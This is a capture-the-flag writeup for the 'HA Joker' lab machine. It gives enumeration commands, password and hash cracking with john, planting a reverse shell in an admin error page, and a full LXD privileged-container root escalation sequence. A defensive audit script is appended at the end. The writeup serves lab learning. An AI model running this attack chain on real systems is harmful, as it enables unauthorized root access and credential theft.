HA Joker CTF Writeup

YAnil Sec
4 min read · Aug 11, 2021

Hello everyone. Today I will explain how to hack the “HA Joker CTF” machine. Let’s start hacking this machine.

nmap -sN -sV <machine_ip>

We can enumerate the machine with nmap (Nmap shows open ports and services).

I want to scan for hidden directories/files on the web server (port 80).

gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip

You can find the answers to question 4 and question 5.

We can see the open ports, services and versions. Let’s try to connect to the web server on port 8080.

We must enter a username and password. I will try to crack the password (I think the username is joker).

HA-HA-HA! I found the password. I think we should find hidden directories/files.

I will use nikto.

nikto -h http://<machine_ip>:8080/ -id joker:<password_here>

I found backup.zip. I think it contains a username and password, and we need a password to unzip the files. Let’s crack the zip password.

zip2john backup.zip > backuphash

I saved backup.zip’s hash to backuphash. Now we should crack the hash.

john --wordlist=<wordlist_path> backuphash

I cracked the password and unzipped the file. I can see a folder (folder name = db).

I found a file in this folder. I read the file and I saw the Super Duper User’s password and username.

I must crack this hash.

nano dbhash

john --wordlist=<wordlist_path> dbhash

In my opinion I should log in to an admin account with this password and username.

I looked at robots.txt and I saw the /administrator/ directory.

I logged in as admin.

I will add a reverse shell to the error page.

HA-HA-HA! But I need a more powerful shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Ctrl+Z

stty raw -echo && fg

stty rows 78 columns 131 (These are my own “rows” and “columns” values. Run “stty -a” to see your values.)

If you run “id” you can see (lxd). Let’s search Google for lxd privesc.

I found a website.

https://www.hackingarticles.in/lxd-privilege-escalation/

I downloaded lxd-alpine-builder.

https://github.com/saghul/lxd-alpine-builder

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

I am starting a web server with Python because I need to download the “alpine-v3.14-x86_64-20210803_1040.tar.gz” file onto the target machine.

python -m SimpleHTTPServer

And I get the file with wget (go to the /tmp folder).

lxc image import ./alpine-v3.14-x86_64-20210803_1040.tar.gz --alias myimage

lxc image list

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

I am ROOT!!!!!

I found the final file. Thanks for reading my writeup.
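
As an added example (not part of the original writeup), these shell functions check for the two conditions the LXD escalation above depends on: an account in the lxd group, and a privileged container with the host's / attached as a disk device. The function names and the sample group and config text are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added defensive example (not from the writeup): flag the two conditions
# the LXD escalation above relies on. All sample data below is constructed.

# Members of the lxd group, one per line, from group(5) text on stdin.
lxd_group_members() {
    awk -F: '$1 == "lxd" { print $4 }' | tr ',' '\n' | sed '/^$/d'
}

# Reads `lxc config show <name> --expanded` text on stdin, prints findings,
# returns 0 when something risky is found and 1 when the config is clean.
audit_container_config() {
    awk '
        /^[^ ]/ { section = $1 }
        $1 == "security.privileged:" && $2 ~ /true/ { priv = 1 }
        section == "devices:" && /^  [^ ]/ { dev = $1; sub(/:$/, "", dev) }
        section == "devices:" && $1 == "source:" { src[dev] = $2 }
        section == "devices:" && $1 == "type:"   { type[dev] = $2 }
        END {
            if (priv) { print "privileged container"; found = 1 }
            for (d in type)
                if (type[d] == "disk" && src[d] == "/") {
                    print "host root mounted by device " d; found = 1
                }
            exit (found ? 0 : 1)
        }'
}

# Constructed /etc/group excerpt.
SAMPLE_GROUP='root:x:0:
lxd:x:108:joker,www-data
sudo:x:27:admin'

# Constructed config matching the container created in the steps above.
SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

printf '%s\n' "$SAMPLE_GROUP" | lxd_group_members
printf '%s\n' "$SAMPLE_CONFIG" | audit_container_config
```

On a real host, feed the functions live data with `lxd_group_members < /etc/group` and `lxc config show <name> --expanded | audit_container_config`.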
